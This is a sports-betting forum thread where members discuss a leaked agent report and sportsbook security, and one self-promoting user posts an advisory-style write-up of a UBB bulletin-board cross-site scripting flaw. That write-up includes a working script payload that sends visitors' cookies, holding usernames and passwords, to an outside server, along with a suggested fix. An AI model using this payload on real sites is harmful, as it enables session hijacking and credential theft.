security related...

Search

There's always next year, like in 75, 90-93, 99 &
Joined
Sep 20, 2004
Messages
15,270
Tokens
Bill,
Agent reports - with new signup NAMES.
 

Banned
Joined
Sep 21, 2004
Messages
802
Tokens
Lander-
How do you know? Did you get in before Patrick edited?
 

Active member
Joined
Jun 20, 2000
Messages
71,780
Tokens
Java, I saw it it was an agent report with real names scary stuff to be out in a public forum
 

Vici@us Desires
Joined
Sep 21, 2004
Messages
1,863
Tokens
thats why we all need to be carefull with the books we like to play with

check for security before signing up with them
 

Ha-Sheesh
Joined
Sep 20, 2004
Messages
2,494
Tokens
<BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR> thats why we all need to be carefull with the books we like to play with

check for security before signing up with them <HR></BLOCKQUOTE>

NICE, YOU GOT IT!!!,,,
but in costa rica, high techs>>> can i laugh?
 

Banned
Joined
Sep 21, 2004
Messages
802
Tokens
newbie-
How come you guys at bet247usa are using Microsoft servers instead of unix/linux based?
 

Ha-Sheesh
Joined
Sep 20, 2004
Messages
2,494
Tokens
software
icon_smile.gif

ill be developing a solid soft
by the end of march madness,
based on unix,

quote, linux sux
 

There's always next year, like in 75, 90-93, 99 &
Joined
Sep 20, 2004
Messages
15,270
Tokens
Has anyone figured out the point of this thread?
All I see is a slow pay book bashing a no pay book.

Am I missing something else?
 

There's always next year, like in 75, 90-93, 99 &
Joined
Sep 20, 2004
Messages
15,270
Tokens
All I'm saying is wouldn't 247's time be better served, say, paying people
icon_wink.gif
instead of searching for holes in SBG's softare?
Nobody here likes SBG anyways.
 

Banned
Joined
Sep 21, 2004
Messages
802
Tokens
Lander-

I figure that newbie is trying to self-promote that he can solve security problems. He had a previous post (which I copied above) asking for security work. He has admitted to working on his own software that he expects to be available for March Madness.

I think the selection of SBG for his post was due to newbie's ability to find a flaw in that particular software.
 

Ha-Sheesh
Joined
Sep 20, 2004
Messages
2,494
Tokens
thanx java, seems you are seriosly guy,
anyways lander, that was in the past,
personally i put an eye on everything...
by the way, i dont know if sbg pays or not..
like java says, i just promoting my self,
how, telling security holes in different gambling softwares, imagine, fox example, this posting forum has a security hole, take a look....

Severity: Malicious users can steal session cookies, allowing
administrative
access to the bulletin board. Also custom html/js insertion in forum page
is possible

Problem:
The ubber cookie can be manually altered allowing to execute javascript
in the forum overview page and (latest posts overview page) and steal
cookies containing username, password and id. This is done by changing
the [displayed name] attribute and post a new topic on the board in the
following cookie


with the following code:
username<script>document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0
height%3D0>')</script>

When posting a new topic on the forum that topic with your html/js is
rendered in the forum overview page. The html/js in the [displayed name]
gets a 0 width 0 height picture from a malicious server sending along the
ubber cookie contents to the server containing username and password.
fooling around with html/js in the [displayed name] attribute can cause
other things like automatic js redirection to logout page, distorting
forum and inserting custom html content

Fix.
the [displayed name] attribute should be filtered for any html tags
before rendering to page.
....


anyways,
just sad, knowing some books paid, 30dimes,
when i charge 2hundred for a unix firewall
 

Banned
Joined
Sep 21, 2004
Messages
802
Tokens
Newbie-
A $200 unix firewall would not have stopped the DOS-attacks I assume you are referring to with the 30 dimes comment. The book's router comes before the firewall and the ISP's router before that.

Security is important and unix firewalls are great. However, the DOS attacks are a different problem.
 

Ha-Sheesh
Joined
Sep 20, 2004
Messages
2,494
Tokens
well, i assume, those techies,
got in touch with the isp techie, if not..
well,, what kind of techie he is,,
it could be stopable, just by rewriting
the routes, of course every equipment has
to be checked, if not, well thats the CTO
problem, anyways, just telling...
 

There's always next year, like in 75, 90-93, 99 &
Joined
Sep 20, 2004
Messages
15,270
Tokens
newbie I'll have a play with that code, but I've been unable to expose the known UBB bugs on this particular version.

I didn't realize that you were an independent, so disregard any remarks aimed at 247 - GL to you.
 

Forum statistics

Threads
1,119,904
Messages
13,575,037
Members
100,883
Latest member
iniesta2025
The RX is the sports betting industry's leading information portal for bonuses, picks, and sportsbook reviews. Find the best deals offered by a sportsbook in your state and browse our free picks section.FacebookTwitterInstagramContact Usforum@therx.com